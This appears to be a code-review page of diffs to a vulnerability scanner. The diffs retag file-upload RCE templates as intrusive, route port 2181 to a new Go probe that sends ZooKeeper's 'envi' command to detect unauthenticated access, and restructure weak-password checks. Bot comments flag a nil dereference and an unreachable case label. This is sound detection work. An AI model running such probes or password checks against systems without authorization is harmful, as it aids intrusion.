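+ tags: rce,powercreator,intrusive,fileupload
  
 requests:
  - raw: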
  • ■ ■ ■ ■
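--- a/config/nuclei-templates/vulnerabilities/seeyon/zhiyuan-file-upload.yaml
+++ b/config/nuclei-templates/vulnerabilities/seeyon/zhiyuan-file-upload.yaml
@@ -8,7 +8,7 @@
  reference:
  - https://www.programmersought.com/article/92658169875/
  remediation: Apply the appropriate patch.
- tags: zhiyuan,rce,upload,seeyon
+ tags: zhiyuan,rce,fileupload,seeyon,intrusive
  
 requests:
  - method: GET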
  • ■ ■ ■ ■
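--- a/config/nuclei-templates/vulnerabilities/weaver/oa-v9-uploads-file.yaml
+++ b/config/nuclei-templates/vulnerabilities/weaver/oa-v9-uploads-file.yaml
@@ -7,7 +7,7 @@
  description: A vulnerability in OA V9 uploadOperation.jsp endpoint allows remote attackers to upload arbitrary files to the server. These files can be subsequently called and are executed by the remote software.
  reference:
  - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
- tags: rce,jsp
+ tags: rce,jsp,fileupload,intrusive
  
 requests:
  - raw: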
  • ■ ■ ■ ■
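--- a/config/nuclei-templates/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
+++ b/config/nuclei-templates/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
@@ -13,7 +13,7 @@
  cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
  cvss-score: 9.8
  cwe-id: CWE-434
- tags: wp-plugin,rce,upload,unauth,wpscan,msf,wordpress,ait-csv,wp
+ tags: wp-plugin,rce,fileupload,unauth,wpscan,msf,wordpress,ait-csv,wp,intrusive
  
 requests:
  - raw: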
  • ■ ■ ■ ■
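--- a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
+++ b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
@@ -12,7 +12,7 @@
  cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  cvss-score: 10.0
  cwe-id: CWE-77
- tags: wpscan,wordpress,wp-plugin,rce,intrusive,upload,python
+ tags: wpscan,wordpress,wp-plugin,rce,intrusive,fileupload,python
  
 requests:
  - raw: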
  • ■ ■ ■ ■ ■ ■
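--- a/pkg/hydra/doNmapResult.go
+++ b/pkg/hydra/doNmapResult.go
@@ -100,13 +100,23 @@
  FinalURL: szUlr,
  Checklog4j: false,
  }
+ } else if bCheckWeakPassword && "110" == szPort && service == "pop3" {
+ CheckWeakPassword(ip, service, port)
+ } else if "2181" == szPort {
+ util.PocCheck_pipe <- &util.PocCheck{
+ Wappalyzertechnologies: &[]string{"ZookeeperUnauthority"},
+ URL: szUlr,
+ FinalURL: szUlr,
+ Checklog4j: false,
+ }
  }
- } else if bCheckWeakPassword && "110" == szPort && service == "pop3" {
- CheckWeakPassword(ip, service, port)
- } else if bCheckWeakPassword && "8728" == szPort && service == "unknown" {
- CheckWeakPassword(ip, "router", port)
- } else if bCheckWeakPassword && ("5985" == szPort || "5986" == szPort) && -1 < strings.Index(service, "microsoft ") {
- CheckWeakPassword(ip, "winrm", port)
+ }
+ if bCheckWeakPassword {
+ if "8728" == szPort && service == "unknown" {
+ CheckWeakPassword(ip, "router", port)
+ } else if ("5985" == szPort || "5986" == szPort) && -1 < strings.Index(service, "microsoft ") {
+ CheckWeakPassword(ip, "winrm", port)
+ }
  }
  
  log.Printf("%s\t%d\t%s\n", ip, port, service)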
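Review bot: The `"110" == szPort && service == "pop3"` branch and the new `"2181" == szPort` branch now come before a closing brace that used to precede the pop3 check, so they appear to chain onto an inner `if` whose condition starts above the hunk rather than onto the outer chain; please confirm that ports 110 and 2181 still reach these branches. The 2181 branch is selected on the port number alone, unlike its neighbours which also test `service`, and it is not gated by any option; a comment such as `// 2181 is ZooKeeper's default client port; this probe runs regardless of bCheckWeakPassword` would record that intent. In the winrm condition, `-1 < strings.Index(service, "microsoft ")` reads more plainly as `strings.Contains(service, "microsoft ")`. The enclosing function starts and ends outside the hunk.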
  • ■ ■ ■ ■ ■ ■
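--- a/pocs_go/apache/poc-go-zookeeper-unauth.go
+++ b/pocs_go/apache/poc-go-zookeeper-unauth.go
@@ -0,0 +1,26 @@
+package apache
+ 
+import (
+ "github.com/hktalent/scan4all/lib/socket"
+ "strings"
+)
+ 
+// ZookeeperUnauthority zookeeper 未授权
+//
+// addr := args.Host + ":2181"
+func ZookeeperUnauthority(szUrl string) bool {
+ payload := "envidddfdsfsafafaerwrwerqwe"
+ x1 := socket.NewCheckTarget(szUrl, "tcp", 10)
+ defer x1.Close()
+ _, err := x1.ConnTarget()
+ if err != nil {
+ return false
+ }
+ x1.WriteWithFlush(payload)
+ s1 := *x1.ReadAll2Str()
+ if "" != s1 && -1 < strings.Index(s1, "Environment") {
+ return true
+ }
+ return false
+}
+ 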
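Review bot: `s1 := *x1.ReadAll2Str()` dereferences the helper's result without a nil check; if `ReadAll2Str` can return nil on a failed or empty read (its code is not shown on this page), the probe panics instead of returning false, so guard it with `p := x1.ReadAll2Str(); if p == nil { return false }`. The outcome of `x1.WriteWithFlush(payload)` is not examined either. Matching the single word `Environment` is a loose test for a finding that is reported as unauthenticated access; also requiring `zookeeper.version`, which the `envi` reply contains, would reduce false positives. The doc comment would be clearer in English, e.g. `// ZookeeperUnauthority reports whether the service at szUrl answers ZooKeeper's "envi" command without authentication.`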
  • ■ ■ ■ ■ ■ ■
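--- a/pocs_go/go_poc_check.go
+++ b/pocs_go/go_poc_check.go
@@ -46,6 +46,10 @@
  for tech := range wappalyzertechnologies {
  caseStr := strings.ToLower(wappalyzertechnologies[tech])
  switch caseStr {
+ case "ZookeeperUnauthority":
+ if apache.ZookeeperUnauthority(finalURL) {
+ technologies = append(technologies, fmt.Sprintf("ZookeeperUnauthority %s", finalURL))
+ }
  case "httpCheckSmuggling":
  Smuggling.DoCheckSmuggling(finalURL, "")
  case "RouterOS":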
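Review bot: The new label `case "ZookeeperUnauthority":` can never match, because the context line just above the switch builds `caseStr` with `strings.ToLower(...)`; the ZooKeeper probe queued from doNmapResult.go is therefore silently skipped and an exposed service goes unreported. Use `case "zookeeperunauthority":` instead. The neighbouring labels `"httpCheckSmuggling"` and `"RouterOS"` have the same mixed case and look unreachable for the same reason. The switch and its enclosing loop continue outside this hunk.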